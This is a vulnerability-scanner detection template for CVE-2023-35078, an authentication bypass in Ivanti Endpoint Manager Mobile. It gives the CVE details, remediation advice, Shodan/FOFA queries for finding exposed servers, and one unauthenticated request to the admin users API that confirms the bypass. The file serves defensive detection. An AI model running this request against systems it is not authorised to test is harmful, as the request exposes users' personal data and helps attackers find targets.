46 lines
2.1 KiB
YAML
46 lines
2.1 KiB
YAML
id: CVE-2023-35078
|
|
|
|
info:
|
|
name: Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass
|
|
author: parth,pdresearch
|
|
severity: critical
|
|
description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability in Endpoint Manager Mobile (EPMM).
|
|
reference:
|
|
- https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability
|
|
- https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078
|
|
- https://www.cisa.gov/news-events/alerts/2023/07/24/ivanti-releases-security-updates-endpoint-manager-mobile-epmm-cve-2023-35078
|
|
- https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm-vulnerability
|
|
- https://help.ivanti.com/mi/help/en_us/CORE/11.2.0.0/dmgw/DMGfiles/Join_Azure_and_MobileIro.htm
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-35078
|
|
cwe-id: CWE-287
|
|
epss-score: 0.96128
|
|
epss-percentile: 0.99326
|
|
cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: ivanti
|
|
product: endpoint_manager_mobile
|
|
shodan-query: http.favicon.hash:362091310
|
|
fofa-query: icon_hash="362091310"
|
|
tags: cve,cve2023,kev,ivanti,mobileiron,epmm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mifs/aad/api/v2/admins/users"
|
|
|
|
max-size: 100
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains_all(body, 'results','userId','name')
|
|
- contains(header, 'application/json')
|
|
- status_code == 200
|
|
condition: and
|
|
# digest: 4a0a00473045022100c0213b9dd318abe655b3e9d444cc31d2107927b25bd5a1f229f913cdd8bc567402201547ec7331597e349abad3218b45363081a875549050d10d02dab081dc6e193d:922c64590222798bb761d5b6d8e72950 |